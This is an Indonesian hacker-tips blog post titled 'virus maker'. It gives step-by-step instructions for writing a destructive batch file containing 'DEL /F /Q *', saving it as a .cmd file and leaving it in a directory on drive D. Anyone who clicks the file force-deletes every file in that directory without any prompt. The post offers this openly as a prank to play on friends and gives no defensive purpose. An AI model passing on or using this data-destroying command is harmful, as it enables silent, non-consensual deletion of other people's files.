SELAMAT DATANG DI "WEB KEREN" TEMUKAN SEMUA INFORMASI MENGENAI TRIK N TIPS HACKER DI SINI

Followers

Donate this blog



Jika anda memiliki artikel mengenai hacker yang belum termuat di blog ini .Anda boleh mengirimkan ke alamat email di bawah.artikel akan di tampilkan dengan tetap mencantumkan nama dan alamat web/blog anda dan mendapat backlink dari webkeren

pertanyaan lebih detail call me on
AchmAdAl@ymail.com
or
03192235717

3.23.2009

virus maker

Membuat virus !sebenarnaya mudah tapi kali ini aq mau berbagi cara membuat file perusak
tapi belum bisa di katakan virus ataupun spam,tapi hanya file perusak saja.
Proses kerjanya :
apabila file ini di klik maka secara otomatis semua file yang ada di direktori D akan terhapus.
Lumayan kan buat ngejailin temen he he he...(tapi ada kelemahannya yaitu file yang ada di dalam folder
tidak terhapus,tapi ada cara untuk mengatasinya ,tinggal letakkan aja di dalam foldernya ntar juga hilang)

terus gimana filenya (sabar bosss!!!)nih filenya



1.buka note pad
2.ketik DEL /F /Q *
3.save dengan akhiran(ektensiI) .cmd
Contoh: test.cmd
4.udah ,kamu tinggal letakkan di direktori D ,dan apabila ada yang mengklik file tadi maka hilang deh semua filenya.




Level: F


Komentar :

ada 0 comments ke “virus maker”

Post a Comment

Tidak ada yang sempurna di DUNIA ini ,karena kesempurnaan hanya milik ALLAH

About Me

My photo
aq anak manusia (mak gw)yang coba belajar lewati keras (batu kali)kehidupan ini.